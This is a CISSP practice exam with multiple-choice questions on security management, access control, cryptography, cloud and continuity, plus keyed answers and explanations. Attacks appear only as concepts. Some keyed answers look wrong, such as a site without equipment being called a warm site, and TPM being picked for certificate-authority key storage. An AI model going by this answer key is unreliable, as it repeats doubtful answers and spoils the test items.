CISSP+ Practice Exam 1


An authentication system that uses challenge and response was recently implemented on an organization's network, because the organization conducted an annual penetration test showing that testers were able to move laterally using authenticated credentials. Which attack method was MOST likely used to achieve this? A. Hash collision B. Pass the ticket C. Brute force D. Cross-Site Scripting (XSS)

B. Pass the ticket "Pass the Ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user's password. Adversaries often use this technique to move laterally through an organization's network to hunt for opportunities to escalate their privileges or fulfill their mission." https://www.netwrix.com/pass_the_ticket.html

Which of the following BEST describes the purpose of the reference monitor when defining access control to enforce the security model? A. Strong operational security to keep unit members safe B. Policies to validate organization rules C. Cyber hygiene to ensure organizations can keep systems healthy D. Quality design principles to ensure quality by design

B. Policies to validate organization rules The reference monitor is a concept in computer security that represents an abstract machine or component responsible for enforcing access control policies. It is an essential component of the security model used to ensure that access to system resources is granted or denied based on predefined rules and policies. The reference monitor validates and enforces these organization-specific rules and policies regarding access control. It acts as a trusted authority that mediates all access requests and determines whether they should be permitted or denied based on the established security policies.

What is the MAIN purpose of a security assessment plan? A. Provide education to employees on security and privacy, to ensure their awareness on policies and procedures. B. Provide the objectives for the security and privacy control assessments and a detailed roadmap of how to conduct such assessments. C. Provide guidance on security requirements, to ensure the identified security risks are properly addressed based on the recommendation. D. Provide technical information to executives to help them understand information security postures and secure funding.

B. Provide the objectives for the security and privacy control assessments and a detailed roadmap of how to conduct such assessments.

What is the BEST approach to anonymizing personally identifiable information (PII) in a test environment? A. Swapping data B. Randomizing data C. Encoding data D. Encrypting data

B. Randomizing data Randomizing data is a common approach to anonymization. It involves replacing original data values with randomly generated values that do not correspond to any real individuals. This ensures that the data cannot be traced back to its original source while still maintaining its structural and statistical properties for testing.

A web developer is completing a new web application security checklist before releasing the application to production. The task of disabling unnecessary services is on the checklist. Which web application threat is being mitigated by this action? A. Session hijacking B. Security misconfiguration C. Broken access control D. Sensitive data exposure

B. Security misconfiguration Disabling unnecessary services helps reduce the attack surface of a web application by eliminating potential entry points for attackers. It helps ensure that only essential services are running, reducing the chances of security vulnerabilities arising from misconfigured or unpatched services. By disabling unnecessary services, the web developer minimizes the risk of security misconfigurations that could be exploited by attackers.

Which reporting type requires a service organization to describe its system and define its control objectives and controls that are relevant to users' internal control over financial reporting? A. Statement on Auditing Standards (SAS) 70 B. Service Organization Control 1 (SOC1) C. Service Organization Control 2 (SOC2) D. Service Organization Control 3 (SOC3)

B. Service Organization Control 1 (SOC1)

A security professional needs to find a secure and efficient method of encrypting data on an endpoint. Which solution includes a root key? A. Bitlocker B. Trusted Platform Module (TPM) C. Virtual storage array network (VSAN) D. Hardware security module (HSM)

B. Trusted Platform Module (TPM) TPM: Integrated into endpoint devices. Secure storage of root keys. Used for disk encryption (e.g., BitLocker). Cost-effective for individual devices. HSM: External hardware used in server environments. Provides high-security key management for enterprise applications. More expensive and complex to implement on individual endpoints.

The security architect is designing and implementing an internal certification authority to generate digital certificates for all employees. Which of the following is the BEST solution to securely store the private keys? A. Physically secured storage device B. Trusted Platform Module (TPM) C. Encrypted flash drive D. Public key infrastructure (PKI)

B. Trusted Platform Module (TPM) Trusted Platform Module (TPM): A TPM is a hardware-based security module that is typically embedded on the motherboard of a computer system. It provides secure storage for cryptographic keys and other sensitive data. TPMs are designed to be tamper-resistant and can be used to protect against various attacks, including cold boot attacks and physical tampering.

A subscription service which provides power, climate control, raised flooring, and telephone wiring but NOT the computer and peripheral equipment is BEST described as a: A. cold site. B. warm site. C. hot site. D. reciprocal site.

B. warm site. A warm site is a facility that provides essential infrastructure and services, such as power and environmental controls, but does not have the actual computer systems and equipment in place. It allows for a quicker recovery compared to a cold site as it has some infrastructure ready, but organizations need to provide and install their own computing equipment.

When developing an organization's information security budget, it is important that the: A. requested funds are at an equal amount to the expected cost of breaches. B. expected risk can be managed appropriately with the funds allocated. C. requested funds are part of a shared funding pool with other areas. D. expected risk to the organization does not exceed the funds allocated.

B. expected risk can be managed appropriately with the funds allocated. When developing an organization's information security budget, it is crucial to ensure that the allocated funds align with the expected risk to the organization. This means that the budget should be sufficient to address the identified risks and implement appropriate security measures. By evaluating the potential risks and their potential impact, organizations can determine the necessary funding to effectively manage and mitigate those risks.

A corporation does not have a formal data destruction policy. During which phase of a criminal legal proceeding will this have the MOST impact? A. Sentencing B. Trial C. Discovery D. Arraignment

C. Discovery The lack of a formal data destruction policy would have the MOST impact during the discovery phase of a criminal legal proceeding. During the discovery phase, both the prosecution and defense exchange relevant information and evidence related to the case. This includes providing documents, records, and other forms of evidence that are pertinent to the case. In the context of a criminal legal proceeding, if a corporation does not have a formal data destruction policy, it may lead to the unintentional or intentional destruction of potentially relevant evidence. This could include deleting or disposing of electronic records, documents, or other forms of data that could be crucial to the case.

Within a large organization, what business unit is BEST positioned to initiate provisioning and deprovisioning of user accounts? A. Training department B. Internal audit C. Human resources D. Information technology (IT)

C. HR

An organization is trying to secure instant messaging (IM) communications through its network perimeter. Which of the following is the MOST significant challenge? A. IM clients can interoperate between multiple vendors. B. IM clients can run as executables that do not require installation. C. IM clients can utilize random port numbers. D. IM clients can run without administrator privileges.

C. IM clients can utilize random port numbers.

In a quarterly system access review, an active privileged account was discovered that did not exist in the prior review on the production system. The account was created one hour after the previous access review. Which of the following is the BEST option to reduce overall risk in addition to quarterly access reviews? A. Implement bi-annual reviews. B. Create policies for system access. C. Implement and review risk-based alerts. D. Increase logging levels.

C. Implement and review risk-based alerts. Implementing and reviewing risk-based alerts would enable early detection of suspicious or unauthorized activity, such as the creation of new privileged accounts, and allow the organization to react accordingly. This proactive approach helps to identify and mitigate potential risks in real time, rather than relying solely on periodic reviews.

A company is planning to implement a private cloud infrastructure. Which of the following recommendations will support the move to a cloud infrastructure? A. Implement software-defined networking (SDN) to provide the ability to apply high-level policies to shape and reorder network traffic based on users, devices and applications. B. Implement a virtual local area network (VLAN) for each department and create a separate subnet for each VLAN. C. Implement software-defined networking (SDN) to provide the ability for the network infrastructure to be integrated with the control and data planes. D. Implement a virtual local area network (VLAN) to logically separate the local area network (LAN) from the physical switches.

C. Implement software-defined networking (SDN) to provide the ability for the network infrastructure to be integrated with the control and data planes.

When assessing web vulnerabilities, how can navigating the dark web add value to a penetration test? A. Information may be found on hidden vendor patches. B. The actual origin and tools used for the test can be hidden. C. Information may be found on related breaches and hacking. D. Vulnerabilities can be tested without impact on the tested environment.

C. Information may be found on related breaches and hacking.

A cloud service provider requires its customer organizations to enable maximum audit logging for its data storage service and to retain the logs for a period of three months. The audit logging generates an extremely high volume of logs. What is the MOST appropriate strategy for the log retention? A. Keep all logs in an online storage. B. Keep last week's logs in an online storage and the rest in an offline storage. C. Keep last week's logs in an online storage and the rest in a near-line storage. D. Keep all logs in an offline storage.

C. Keep last week's logs in an online storage and the rest in a near-line storage. Near-line storage allows the data to be retrieved at very little or no additional cost over a short period such as 3 months.

What documentation is produced FIRST when performing an effective physical loss control process? A. Deterrent controls list B. Security standards list C. Asset valuation list D. Inventory list

D. Inventory list The first step in an effective physical loss control process is to conduct an inventory of the organization's assets. This includes identifying, cataloging, and valuing all physical assets that are important to the organization. The inventory list should include a description of each asset, its location, and its value. This information is used to identify the most critical assets that need to be protected and to prioritize security measures. The inventory list serves as the foundation for the rest of the physical loss control process, providing a clear understanding of the assets that need to be protected and the potential risks that they may face.

Which section of the assessment report addresses separate vulnerabilities, weaknesses, and gaps? A. Findings definition section B. Risk review section C. Executive summary with full details D. Key findings section

D. Key findings section

An application developer receives a report back from the security team showing their automated tools were able to successfully enter unexpected data into the organization's customer service portal, causing the site to crash. This is an example of which type of testing? A. Performance B. Positive C. Non-functional D. Negative

D. Negative Negative testing ensures that your application can gracefully handle invalid input or unexpected user behavior. In this case, the application fails the negative testing. For example, if a user tries to type a letter in a numeric field, the correct behavior would be to display the "Incorrect data type, please enter a number" message. The purpose of negative testing is to detect such situations and prevent applications from crashing. This has nothing to do with non-functional testing, because non-functional testing is a type of software testing that verifies non-functional aspects of the product, such as performance, stability, and usability.

What type of risk is related to the sequences of value-adding and managerial activities undertaken in an organization? A. Control risk B. Demand risk C. Supply risk D. Process risk

D. Process risk

In a DevOps environment, which of the following actions is MOST necessary to have confidence in the quality of the changes being made? A. Prepare to take corrective actions quickly. B. Automate functionality testing. C. Review logs for any anomalies. D. Receive approval from the change review board.

D. Receive approval from the change review board.

What is the MOST significant benefit of role-based access control (RBAC)? A. Reduces inappropriate access B. Management of least privilege C. Most granular form of access control D. Reduction in authorization administration overhead

D. Reduction in authorization administration overhead

What process facilitates the balance of operational and economic costs of protective measures with gains in mission capability? A. Performance testing B. Risk assessment C. Security audit D. Risk management

D. Risk Management Risk management involves balancing operational and economic costs of protective measures with the gains in mission capability. It assesses potential risks and implements strategies to mitigate them while considering both cost and effectiveness.

What industry-recognized document could be used as a baseline reference that is related to data security and business operations or conducting a security assessment? A. Service Organization Control (SOC) 1 Type 2 B. Service Organization Control (SOC) 1 Type 1 C. Service Organization Control (SOC) 2 Type 2 D. Service Organization Control (SOC) 2 Type 1

D. Service Organization Control (SOC) 2 Type 1

An organization would like to implement an authorization mechanism that would simplify the assignment of various system access permissions for many users with similar job responsibilities. Which type of authorization mechanism would be the BEST choice for the organization to implement? A. Role-based access control (RBAC) B. Discretionary access control (DAC) C. Content-dependent Access Control D. Rule-based Access Control

A. Users with similar responsibilities should always be assigned a role. This simplifies the process of granting access when users join the team as well as move to new teams.

What is the MOST effective method to enhance security of a single sign-on (SSO) solution that interfaces with critical systems? A. Two-factor authentication B. Reusable tokens for application level authentication C. High performance encryption algorithms D. Secure Sockets Layer (SSL) for all communications

A. Two-factor authentication Two-factor authentication (2FA) adds an additional layer of security to the authentication process by requiring users to provide two forms of identification: something they know (e.g., a password) and something they have (e.g., a physical token or a mobile device). This approach significantly reduces the risk of unauthorized access even if the user's password is compromised.

What is the BEST way to restrict access to a file system on computing systems? A. Use least privilege at each level to restrict access. B. Restrict access to all users. C. Allow a user group to restrict access. D. Use a third-party tool to restrict access.

A. Use least privilege at each level to restrict access.

Which of the following is the MOST appropriate control for asset data labeling procedures? A. Categorizing the types of media being used B. Logging data media to provide a physical inventory control C. Reviewing off-site storage access controls D. Reviewing audit trails of logging records

A. Categorizing the types of media being used. Asset data labeling procedures involve labeling and categorizing different types of media (such as physical storage devices, electronic media, or documents) to effectively manage and track data assets. Categorizing the types of media being used helps in identifying and distinguishing between different storage devices and media types, allowing for better organization and control. By categorizing the types of media, organizations can implement appropriate security controls and procedures tailored to each category. This includes assigning different levels of sensitivity or classification to data stored on specific media, implementing access controls based on media types, and applying specific handling and disposal procedures.

The acquisition of personal data being obtained by a lawful and fair means is an example of what principle? A. Collection Limitation Principle B. Openness Principle C. Purpose Specification Principle D. Data Quality Principle

A. Collection Limitation Principle: limit the collection of personal data to only what is needed to provide a service, and obtain the personal data lawfully and, where appropriate, with the knowledge or consent of the data subject.

Which one of the following BEST protects vendor accounts that are used for emergency maintenance? A. Vendor access should be disabled until needed B. Frequent monitoring of vendor access C. Role-based access control (RBAC) D. Encryption of routing tables

A. Accounts should be disabled until needed. Emergency accounts are intended for short-term use and include restrictions on creation, point of origin, and usage (i.e., time of day, day of week). SEs may establish emergency accounts in response to crisis situations and with the need for rapid account activation. Therefore, emergency account activation may bypass normal account authorization processes. Emergency accounts must be automatically disabled after 24 hours. https://www.cisecurity.org/wp-content/uploads/2020/06/Account-Management-Access-Control-Standard.docx

Which organizational department is ultimately responsible for information governance related to e-mail and other e-records? A. Legal B. Audit C. Compliance D. Security

A. Legal While data governance focuses mostly on the technical aspects of data handling, information governance takes a broader approach by incorporating legal, regulatory, and strategic considerations. https://www.epiqglobal.com/en-us/resource-center/articles/data-governance-vs-information-governance#:~:text=While%20data%20governance%20focuses%20mostly,information%20as%20a%20valuable%20asset

Which of the following would an information security professional use to recognize changes to content, particularly unauthorized changes? A. File Integrity Checker B. Security information and event management (SIEM) system C. Audit Logs D. Intrusion detection system (IDS)

A. File integrity monitoring (FIM) refers to an IT security process and technology that tests and checks operating system (OS), database, and application software files to determine whether or not they have been tampered with or corrupted. FIM, which is a type of change auditing, verifies and validates these files by comparing the latest versions of them to a known, trusted "baseline." If FIM detects that files have been altered, updated, or compromised, FIM can generate alerts to ensure further investigation, and if necessary, remediation, takes place.

What is the PRIMARY reason for criminal law being difficult to enforce when dealing with cybercrime? A. Jurisdiction is hard to define. B. Law enforcement agencies are understaffed. C. Extradition treaties are rarely enforced. D. Numerous language barriers exist.

A. Cybercrime can take place across borders, making it difficult to determine which jurisdiction has the authority to investigate and prosecute the crime. This can be especially challenging when the attacker is located in a different country than the victim. The other answer choices are also factors that can make it difficult to enforce criminal law when dealing with cybercrime, but they are not as important as the issue of jurisdiction.

The quality assurance (QA) department is short-staffed and is unable to test all modules before the anticipated release date of an application. What security control is MOST likely to be violated? A. Change management B. Separation of environments C. Program management D. Mobile code controls

A. Change management Violated the "Release Control" of Change Management. Release Control Once the changes are finalized, they must be approved for release through the release control procedure. An essential step of the release control process is to double-check and ensure that any code inserted as a programming aid during the change process (such as debugging code and/or backdoors) is removed before releasing the new software to production. This process also ensures that only approved changes are made to production systems. Release control should also include acceptance testing to ensure that any alterations to end-user work tasks are understood and functional.

What term is commonly used to describe hardware and software assets that are stored in a configuration management database (CMDB)? A. Configuration item B. Configuration element C. Ledger item D. Asset register

A. Configuration item A configuration item refers to any component or element of an IT system that needs to be managed and controlled. It can include physical devices, software applications, databases, network components, and other related items. The CMDB is a central repository that stores information about these configuration items, including their attributes, relationships, and configurations.

Which of the following is the MOST effective strategy to prevent an attacker from disabling a network? A. Design networks with the ability to adapt, reconfigure, and fail over. B. Test business continuity and disaster recovery (DR) plans. C. Follow security guidelines to prevent unauthorized network access. D. Implement network segmentation to achieve robustness.

A. Design networks with the ability to adapt, reconfigure, and fail over. This approach ensures that the network can maintain its functionality even when under attack. This strategy offers resilience against a wide range of attacks. Examples include: 1. Software-Defined Networking (SDN): SDN controllers enable dynamic network reconfiguration and policy enforcement. 2. Network Function Virtualization (NFV): Virtualizes network services to allow for rapid deployment and scaling. 3. Load Balancers: Distribute traffic across multiple servers to prevent overload and ensure availability.

Which combination of cryptographic algorithms is compliant with Federal Information Processing Standard (FIPS) Publication 140-2 for non-legacy systems? A. Diffie-Hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Digital Signature Algorithm (DSA) (>=2048 bits) B. Diffie-Hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Rivest-Shamir-Adleman (RSA) (1024 bits) C. Diffie-Hellman (DH) key exchange: DH (<=1024 bits) Symmetric Key: Blowfish Digital Signature: Rivest-Shamir-Adleman (RSA) (>=2048 bits) D. Diffie-Hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) < 128 bits Digital Signature: Elliptic Curve Digital Signature Algorithm (ECDSA) (>=256 bits)

A. Diffie-Hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Digital Signature Algorithm (DSA) (>=2048 bits)

Which of the following is the BEST option to reduce the network attack surface of a system? A. Disabling unnecessary ports and services B. Ensuring that there are no group accounts on the system C. Uninstalling default software on the system D. Removing unnecessary system user accounts

A. Disabling unnecessary ports and services The attack surface is the number of all possible points, or attack vectors, where an unauthorized user can access a system and extract data. The smaller the attack surface, the easier it is to protect. https://www.fortinet.com/resources/cyberglossary/attack-surface

Which of the following is the BEST way to protect an organization's data assets? A. Encrypt data in transit and at rest using up-to-date cryptographic algorithms. B. Monitor and enforce adherence to security policies. C. Require Multi-Factor Authentication (MFA) and Separation of Duties (SoD). D. Create the Demilitarized Zone (DMZ) with proxies, firewalls and hardened bastion hosts.

A. Encrypt data in transit and at rest using up-to-date cryptographic algorithms.

Wi-Fi Protected Access 2 (WPA2) provides users with a higher level of assurance that their data will remain protected by using which protocol? A. Extensible Authentication Protocol (EAP) B. Internet Protocol Security (IPsec) C. Secure Sockets Layer (SSL) D. Secure Shell (SSH)

A. Extensible Authentication Protocol (EAP) is the protocol used by Wi-Fi Protected Access 2 (WPA2) to provide users with a higher level of assurance that their data will remain protected. EAP provides a framework for transporting authentication protocols that are used in wireless networks, and it is used to authenticate users and devices before they are granted access to the network.

Which of the following would qualify as an exception to the "right to be forgotten" of the General Data Protection Regulation (GDPR)? A. For the establishment, exercise, or defense of legal claims B. The personal data has been lawfully processed and collected C. For the reasons of private interest D. The personal data remains necessary to the purpose for which it was collected

A. For the establishment, exercise, or defense of legal claims The right to be forgotten allows individuals to request the erasure of their personal data under certain circumstances. However, this right is not absolute, and there are exceptions where data can be retained even if a request for erasure is made. One such exception is when the personal data is necessary for the establishment, exercise, or defense of legal claims. In such cases, the organization may be required to retain the data to fulfill its legal obligations or protect its legal rights. https://gdpr-info.eu/issues/right-to-be-forgotten/

Which of the following is MOST appropriate to collect evidence of a zero-day attack? A. Honeypot B. Antispam C. Antivirus D. Firewall

A. Honeypot

A company is attempting to enhance the security of its user authentication processes. After evaluating several options, the company has decided to utilize Identity as a Service (IDaaS). Which of the following factors leads the company to choose an IDaaS as their solution? A. In-house team lacks resources to support an on-premise solution. B. Third-party solutions are inherently more secure. C. Third-party solutions are known for transferring the risk to the vendor. D. In-house development provides more control.

A. In-house team lacks resources to support an on-premise solution

Using the cipher text and resultant cleartext message to derive the monoalphabetic cipher key is an example of which method of cryptanalytic attack? A. Known-plaintext attack B. Ciphertext-only attack C. Frequency analysis D. Probable-plaintext attack

A. Known-plaintext attack (p. 299 of the Sybex book)

Which of the following criteria ensures information is protected relative to its importance to the organization? A. Legal requirements, value, criticality, and sensitivity to unauthorized disclosure or modification B. The value of the data to the organization's senior management C. Organizational stakeholders, with classification approved by the management board D. Legal requirements determined by the organization headquarters' location

A. Legal requirements, value, criticality, and sensitivity to unauthorized disclosure or modification

Which of the following ensures old log data is not overwritten? A. Log retention B. Implement Syslog C. Increase log file size D. Log preservation

A. Log retention Data retention is the storing of data for recordkeeping and regulatory compliance, while data preservation is preserving ESI for an anticipated legal matter.

What is the PRIMARY purpose of creating and reporting metrics for a security awareness, training, and education program? A. Measure the effect of the program on the organization's workforce. B. Make all stakeholders aware of the program's progress. C. Facilitate supervision of periodic training events. D. Comply with legal regulations and document due diligence in security practices.

A. Measure the effect of the program on the organization's workforce. Demonstrate ROI: Justify the program's existence and secure continued funding. Identify areas for improvement: Pinpoint weaknesses in training content or delivery. Enhance security culture: Foster a culture of security awareness among employees. While the other options are important, they are secondary to the overall goal of measuring the program's impact on the workforce.

Which of the following is the MOST effective way to ensure the endpoint devices used by remote users are compliant with an organization's approved policies before being allowed on the network? A. Network Access Control (NAC) B. Privileged Access Management (PAM) C. Group Policy Object (GPO) D. Mobile Device Management (MDM)

A. Network Access Control (NAC) Network Access Control (NAC): NAC solutions provide a comprehensive approach to managing and enforcing security policies for devices attempting to access network resources. They can perform health checks on devices to ensure compliance with security policies (e.g., antivirus presence, up-to-date patches) before granting network access. This makes NAC highly effective for verifying compliance of endpoint devices used by remote users. NAC provides a holistic approach by integrating various checks and balances to ensure all endpoint devices meet the required security policies before accessing the network, making it the most effective solution for this purpose.

Which of the following departments initiates the request, approval, and provisioning business process? A. Operations B. Security C. Human resources (HR) D. Information technology (IT)

A. Operations. Operations, as the process owner, gives the requirements to IT. HR is responsible for access provisioning, not for business process provisioning.

A criminal organization is planning an attack on a government network. Which of the following scenarios presents the HIGHEST risk to the organization? A. Organization loses control of their network devices. B. Network is flooded with communication traffic by the attacker. C. Network management communications is disrupted. D. Attacker accesses sensitive information regarding the network topology.

A. Organization loses control of their network devices.

An organization has implemented a protection strategy to secure the network from unauthorized external access. The new Chief Information Security Officer(CISO) wants to increase security by better protecting the network from unauthorized internal access. Which Network Access Control (NAC) capability BEST meets this objective? A. Port security B. Two-factor authentication (2FA) C. Strong passwords D. Application firewall

A. Port security. NAC = port security. The key word is "increase": the question tells us that a control has already been implemented, and now they want to increase it (B would also be an increase, from one factor to two). Port security is a Network Access Control (NAC) feature that controls access to a network by limiting the number of devices that can be connected to a switch port. It helps prevent unauthorized devices from gaining access to the internal network by ensuring that only authorized devices are allowed to connect to specific network ports.

Which of the following does the security design process ensure within the System Development Life Cycle (SDLC)? A. Proper security controls, security objectives, and security goals are properly initiated. B. Security objectives, security goals, and system test are properly conducted. C. Proper security controls, security goals, and fault mitigation are properly conducted. D. Security goals, proper security controls, and validation are properly initiated.

A. Proper security controls, security objectives, and security goals are properly initiated. The security design process within the System Development Life Cycle (SDLC) ensures that proper security controls, security objectives, and security goals are properly initiated. This includes identifying and assessing risks, and implementing controls to mitigate those risks. The security design process is a critical step in ensuring the security and integrity of a system throughout its lifecycle.

A company needs to provide shared access of sensitive data on a cloud storage to external business partners. Which of the following identity models is the BEST to blind identity providers (IdP) and relying parties (RP) so that subscriber lists of other parties are not disclosed? A. Proxied federation B. Dynamic registration C. Federation authorities D. Static registration

A. Proxied federation

An organization has requested storage area network (SAN) disks for a new project. What Redundant Array of Independent Disks (RAID) level provides the BEST redundancy and fault tolerance? A. RAID level 1 B. RAID level 3 C. RAID level 4 D. RAID level 5

A. RAID level 1. RAID 1 offers superior redundancy because it maintains an exact copy of all data on a second drive. In contrast, RAID 5 uses parity to protect data, which is efficient but slightly weaker in terms of redundancy.

What level of Redundant Array of Independent Disks (RAID) is configured PRIMARILY for high-performance data reads and writes? A. RAID-0 B. RAID-1 C. RAID-5 D. RAID-6

A. RAID-0

An international organization has decided to use a Software as a Service (SaaS) solution to support its business operations. Which of the following compliance standards should the organization use to assess the international code security and data privacy of the solution? A. Service Organization Control (SOC) 2 B. Information Assurance Technical Framework (IATF) C. Health Insurance Portability and Accountability Act (HIPAA) D. Payment Card Industry (PCI)

A. Service Organization Control (SOC) 2 Focus on Security, Availability, and Privacy: SOC 2 reports are specifically designed to evaluate service providers, like SaaS vendors, on controls related to the security, availability, processing integrity, confidentiality, and privacy of the systems they use to process customers' data. International Applicability: While developed by the American Institute of Certified Public Accountants (AICPA), SOC 2 is widely recognized internationally and often requested by organizations worldwide. Flexibility: SOC 2 allows specifying the Trust Services Criteria (security, privacy, etc.) that are most relevant to the organization's needs. B. Information Assurance Technical Framework (IATF): IATF is primarily used within US government agencies. It might have relevance in limited contexts, but it's less common for commercial business purposes.

What is the BEST method to use for assessing the security impact of acquired software? A. Threat modeling B. Common vulnerability review C. Software security compliance validation D. Vendor assessment

A. Threat modeling

Which technique helps system designers consider potential security concerns of their systems and applications? A. Threat modeling B. Manual inspections and reviews C. Source code review D. Penetration testing

A. Threat modeling. A threat model is a structured representation of all the information that affects the security of an application. In essence, it is a view of the application and its environment through the lens of security. https://owasp.org/www-community/Threat_Modeling#:~:text=A%20threat%20model%20is%20a,through%20the%20lens%20of%20security.

As a design principle, which one of the following actors is responsible for identifying and approving data security requirement in a cloud ecosystem? A. Cloud auditor B. Cloud broker C. Cloud provider D. Cloud consumer

Answer D) Cloud consumer. The cloud consumer is responsible for DATA SECURITY in IaaS, PaaS and SaaS. https://www.isc2.org/insights/2021/02/responsibility-and-accountability-in-the-cloud

Which of the following statements BEST describes least privilege principle in a cloud environment? A. A single cloud administrator is configured to access core functions. B. Internet traffic is inspected for all incoming and outgoing packets. C. Routing configurations are regularly updated with the latest routes. D. Network segments remain private if unneeded to access the internet.

Answer D: Least privilege extends beyond human access. The model can be applied to applications, systems or connected devices that require privileges or permissions to perform a required task. So internet access is being limited until it is needed to perform a specific task.

An attack utilizing social engineering and a malicious Uniform Resource Locator (URL) link to take advantage of a victim's existing browser session with a web application is an example of which of the following types of attack? A. Clickjacking B. Cross-site request forgery (CSRF) C. Cross-Site Scripting (XSS) D. Injection

Answer is B. Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. A CSRF attack hinges on the use of social engineering. An attacker fools their victim by sending a link through a chat or email. When a victim is a user without admin privileges, the CSRF attack can make them do things like change an email address as it appears in the target site's system, transfer funds from an account, change username information, and more. If the victim has administrator privileges, the CSRF attack can be used to alter the function of the web application itself. https://www.fortinet.com/resources/cyberglossary/csrf

Which of the following encryption technologies has the ability to function as a stream cipher? A. Cipher Block Chaining (CBC) with error propagation B. Electronic Code Book (ECB) C. Cipher Feedback (CFB) D. Feistel cipher

Answer is C Cipher feedback mode allows a block cipher with block size n bits to be used as a stream cipher with a data encryption unit of m bits, for any m ≤ n. In CFB mode, the block cipher operates on a register of n bits. The register is initially filled with an initialization vector.

Which of the following is MOST important to follow when developing information security controls for an organization? A. Use industry standard best practices for security controls in the organization. B. Exercise due diligence with regard to all risk management information to tailor appropriate controls. C. Review all local and international standards and choose the most stringent based on location. D. Perform a risk assessment and choose a standard that addresses existing gaps.

Answer is D. "To assess risk, you need to think about threats and vulnerabilities. Start by making a list of any potential threats to your organization's assets, then score these threats based on their likelihood and impact. From there, think about what vulnerabilities exist within your organization, categorize and rank them based on potential impact. These vulnerabilities can consist of people (employees, clients, third parties), processes or lack thereof, and technologies in place." https://www.barradvisory.com/roadmap-to-implementing-a-successful-information-security-program/

Which application type is considered high risk and provides a common way for malware and viruses to enter a network? A. Instant messaging or chat applications B. Peer-to-Peer (P2P) file sharing applications C. E-mail applications D. End-to-end applications

B

Which of the following is performed to determine a measure of success of a security awareness training program designed to prevent social engineering attacks? A. Employee evaluation of the training program B. Internal assessment of the training program's effectiveness C. Multiple choice tests to participants D. Management control of reviews

B. Internal assessment of the training program's effectiveness To determine the measure of success of a security awareness training program designed to prevent social engineering attacks, conducting an internal assessment of the program's effectiveness is essential. This assessment involves evaluating the program's impact on employees' knowledge, behavior, and ability to recognize and respond to social engineering attacks. It helps determine whether the training program is achieving its intended objectives and identifies areas for improvement.

Which of the following attacks, if successful, could give an intruder complete control of a software-defined networking (SDN) architecture? A. A brute force password attack on the Secure Shell (SSH) port of the controller B. Sending control messages to open a flow that does not pass a firewall from a compromised host within the network C. Remote Authentication Dial-In User Service (RADIUS) token replay attack D. Sniffing the traffic of a compromised host inside the network

B The attack that could give an intruder complete control of a software-defined networking (SDN) architecture is option B: Sending control messages to open a flow that does not pass a firewall from a compromised host within the network. In software-defined networking, the SDN controller is responsible for managing and controlling the network infrastructure. By sending control messages to open a flow that bypasses the firewall from a compromised host within the network, an attacker can gain unauthorized access and manipulate the network's behavior. This type of attack, known as a flow rule modification attack, can allow an attacker to inject malicious traffic into the network or bypass security controls, giving the attacker complete control over the network.

Which of the following is included in change management? A. Technical review by business owner B. User Acceptance Testing (UAT) before implementation C. Cost-benefit analysis (CBA) after implementation D. Business continuity testing

B. User Acceptance Testing (UAT) is a crucial component of change management. It ensures that the change (new system, feature, or process) meets the end-users' requirements and expectations before it is fully implemented.

Which event magnitude is defined as deadly, destructive, and disruptive when a hazard interacts with human vulnerability? A. Crisis B. Catastrophe C. Accident D. Disaster

B Catastrophe According to the CISSP official book, a catastrophe is defined as a major disruption that destroys the facility altogether. This aligns with the question's description of an event magnitude that is deadly, destructive, and disruptive when a hazard interacts with human vulnerability. In contrast, a disaster is described as an event that causes the entire facility to be unusable for a day or longer, but does not necessarily destroy the facility.

An enterprise is developing a baseline cybersecurity standard its suppliers must meet before being awarded a contract. Which of the following statements is TRUE about the baseline cybersecurity standard? A. It should be expressed as general requirements. B. It should be expressed as technical requirements. C. It should be expressed in business terminology. D. It should be expressed in legal terminology.

B. A baseline cybersecurity standard should be expressed in technical requirements to ensure clear and measurable expectations for suppliers. This includes specific controls, technologies, and processes that must be implemented. While general requirements can provide a high-level overview, technical requirements are essential for effective evaluation and enforcement of the standard. Here's a breakdown of why the other options are less effective: A. General requirements: Too vague and difficult to enforce. C. Business terminology: While understanding business needs is important, the standard should focus on technical implementation details. D. Legal terminology: While legal considerations are important, the primary focus should be on technical requirements to ensure effective security.

What is the correct order of execution for security architecture? A. Governance, strategy and program management, operations, project delivery B. Governance, strategy and program management, project delivery, operations C. Strategy and program management, project delivery, governance, operations D. Strategy and program management, governance, project delivery, operations

B. Governance, strategy and program management, project delivery, operations

Which access control method is based on users issuing access requests on system resources, features assigned to those resources, the operational or situational context, and a set of policies specified in terms of those features and context? A. Mandatory Access Control (MAC) B. Attribute Based Access Control (ABAC) C. Role Based Access Control (RBAC) D. Discretionary Access Control (DAC)

B. In ABAC, access decisions are made based on various attributes or characteristics associated with users, resources, and the environment. These attributes can include user roles, job titles, time of day, location, device type, and any other relevant contextual information. Policies are defined using these attributes, and access requests are evaluated against these policies to determine whether access should be granted or denied. ABAC offers a more flexible and fine-grained access control approach compared to other methods such as Role Based Access Control (RBAC) or Discretionary Access Control (DAC). It allows organizations to define access control policies based on dynamic and contextual factors, providing granular control over resource access and helping to enforce security requirements based on specific conditions. https://techgenix.com/5-access-control-types-comparison/

To monitor the security of buried data lines inside the perimeter of a facility, which of the following is the MOST effective control? A. Fencing around the facility with closed-circuit television (CCTV) cameras at all entry points B. Ground sensors installed and reporting to a security event management (SEM) system C. Regular sweeps of the perimeter, including manual inspection of the cable ingress points D. Steel casing around the facility ingress points

B. Ground sensors installed and reporting to a security event management (SEM) system. Ground sensors are devices that can detect vibrations or other disturbances in the ground. When a ground sensor is triggered, it sends an alert to a security event management (SEM) system. The SEM system can then notify security personnel of the alert, so they can investigate the situation.

